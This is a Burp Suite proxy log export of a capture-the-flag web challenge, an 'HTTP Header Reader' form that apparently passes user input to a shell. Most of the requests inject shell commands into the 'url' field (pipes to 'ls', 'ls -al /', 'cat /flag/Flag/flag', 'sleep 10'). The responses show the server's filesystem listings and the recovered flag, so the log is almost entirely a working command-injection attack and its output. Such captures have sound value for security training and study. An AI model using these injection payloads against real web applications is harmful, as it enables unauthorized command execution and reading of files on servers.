<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Sun Dec 16 21:38:13 CST 2018">
  <item>
    <time>Sun Dec 16 21:29:33 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /index.php HTTP/1.1
Host: 140.110.112.32:31339
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>384</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:29:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 217

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:29:45 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 13
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1]]></request>
    <status>200</status>
    <responselength>628</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:29:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 461

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>HTTP/1.1 200 OK<br>Server: nginx/1.10.3 (Ubuntu)<br>Date: Sun, 16 Dec 2018 13:29:45 GMT<br>Content-Type: text/html; charset=UTF-8<br>Transfer-Encoding: chunked<br>Connection: keep-alive<br><br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:29:55 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 18
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=www.google.com]]></request>
    <status>200</status>
    <responselength>1210</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:29:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1042

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>HTTP/1.1 200 OK<br>Date: Sun, 16 Dec 2018 13:29:55 GMT<br>Expires: -1<br>Cache-Control: private, max-age=0<br>Content-Type: text/html; charset=ISO-8859-1<br>P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."<br>Server: gws<br>X-XSS-Protection: 1; mode=block<br>X-Frame-Options: SAMEORIGIN<br>Set-Cookie: 1P_JAR=2018-12-16-13; expires=Tue, 15-Jan-2019 13:29:55 GMT; path=/; domain=.google.com<br>Set-Cookie: NID=150=HfBuLUrt7hJ0-5C_IT7dlOsj9JLM5zv4sfQF_2_PEcupjLHlEw_Md9-eXcLeFCEsNKBmPyFbNbdpLkCS0uLTBUPRfdokz6FGutMNOBsLSiH2MEgOHF3h8jyyog16F8-zpvRu8OQvxZ-DgMdkmewzaauNtXgleO9sTIf4YM8D3bo; expires=Mon, 17-Jun-2019 13:29:55 GMT; path=/; domain=.google.com; HttpOnly<br>Accept-Ranges: none<br>Vary: Accept-Encoding<br>Transfer-Encoding: chunked<br><br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:30:08 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 21
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1%3Bls%3B]]></request>
    <status>200</status>
    <responselength>384</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:30:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 217

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:30:15 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 16
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1%3B]]></request>
    <status>200</status>
    <responselength>384</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:30:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 217

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:31:23 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 20
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1+%7C+ls]]></request>
    <status>200</status>
    <responselength>468</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:31:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 301

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>index.nginx-debian.html<br>index.php<br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:34:06 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 26
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1+%7C+ls+..%2F]]></request>
    <status>200</status>
    <responselength>436</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:34:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 269

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>html<br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:34:19 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 31
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1+%7C+ls+..%2F..%2F]]></request>
    <status>200</status>
    <responselength>524</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:34:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 357

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>backups<br>cache<br>lib<br>local<br>lock<br>log<br>mail<br>opt<br>run<br>spool<br>tmp<br>www<br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:34:36 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 36
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1+%7C+ls+..%2F..%2F..%2F]]></request>
    <status>200</status>
    <responselength>578</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:34:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 411

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>bin<br>boot<br>dev<br>etc<br>flag<br>home<br>lib<br>lib64<br>media<br>mnt<br>opt<br>proc<br>root<br>run<br>sbin<br>srv<br>sys<br>tmp<br>usr<br>var<br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:34:51 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 24
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1+%7C+ls+%2F]]></request>
    <status>200</status>
    <responselength>578</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:34:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 411

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>bin<br>boot<br>dev<br>etc<br>flag<br>home<br>lib<br>lib64<br>media<br>mnt<br>opt<br>proc<br>root<br>run<br>sbin<br>srv<br>sys<br>tmp<br>usr<br>var<br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:35:06 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 28
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1+%7C+ls+-al+%2F]]></request>
    <status>200</status>
    <responselength>1605</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:35:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1437

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>total 80<br>drwxr-xr-x   1 root root 4096 Dec  5 18:04 .<br>drwxr-xr-x   1 root root 4096 Dec  5 18:04 ..<br>-rwxr-xr-x   1 root root    0 Dec  5 18:04 .dockerenv<br>drwxr-xr-x   1 root root 4096 May  2  2018 bin<br>drwxr-xr-x   2 root root 4096 Apr 12  2016 boot<br>drwxr-xr-x   5 root root  360 Dec  5 18:04 dev<br>drwxr-xr-x   1 root root 4096 Dec  5 18:04 etc<br>drwxrwxr-x   3 root root 4096 May  2  2018 flag<br>drwxr-xr-x   2 root root 4096 Apr 12  2016 home<br>drwxr-xr-x   1 root root 4096 Sep 13  2015 lib<br>drwxr-xr-x   2 root root 4096 Nov 14  2017 lib64<br>drwxr-xr-x   2 root root 4096 Nov 14  2017 media<br>drwxr-xr-x   2 root root 4096 Nov 14  2017 mnt<br>drwxr-xr-x   2 root root 4096 Nov 14  2017 opt<br>dr-xr-xr-x 891 root root    0 Dec  5 18:04 proc<br>drwx------   2 root root 4096 Nov 14  2017 root<br>drwxr-xr-x   1 root root 4096 Dec  5 18:04 run<br>drwxr-xr-x   1 root root 4096 Nov 17  2017 sbin<br>drwxr-xr-x   2 root root 4096 Nov 14  2017 srv<br>dr-xr-xr-x  13 root root    0 Dec  6 16:43 sys<br>drwxrwxrwt   1 root root 4096 Dec  5 18:04 tmp<br>drwxr-xr-x   1 root root 4096 Nov 14  2017 usr<br>drwxr-xr-x   1 root root 4096 May  2  2018 var<br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:35:25 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 32
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1+%7C+ls+-al+%2Fflag]]></request>
    <status>200</status>
    <responselength>582</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:35:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 415

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>total 12<br>drwxrwxr-x 3 root root 4096 May  2  2018 .<br>drwxr-xr-x 1 root root 4096 Dec  5 18:04 ..<br>drwxrwxr-x 2 root root 4096 May  2  2018 Flag<br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:35:40 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 39
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1+%7C+ls+-al+%2Fflag%2FFlag]]></request>
    <status>200</status>
    <responselength>582</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:35:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 415

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>total 12<br>drwxrwxr-x 2 root root 4096 May  2  2018 .<br>drwxrwxr-x 3 root root 4096 May  2  2018 ..<br>-rw-rw-r-- 1 root root   44 Mar 24  2018 flag<br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:35:55 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 43
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1+%7C+cat+%2Fflag%2FFlag%2Fflag]]></request>
    <status>200</status>
    <responselength>475</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:35:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 308

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
<h3>Here's your header :</h3><pre>BreakALLCTF{43sy_c0mM4nD_1nj3ctI0N_F0r_fuN}<br><br></pre></body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Sun Dec 16 21:36:08 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:31339/index.php]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>31339</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/index.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /index.php HTTP/1.1
Host: 140.110.112.32:31339
Content-Length: 26
Cache-Control: max-age=0
Origin: http://140.110.112.32:31339
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32:31339/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

url=127.0.0.1+%7C+sleep+10]]></request>
    <status>200</status>
    <responselength>384</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sun, 16 Dec 2018 13:36:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 217

<html>
<body>
<h1>HTTP Header Reader v0.008</h1>
<form action="index.php" method="POST">
    <input type="text" size="50" name="url" placeholder="URL">
    <input type="submit" value="submit">
</from>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
</items>
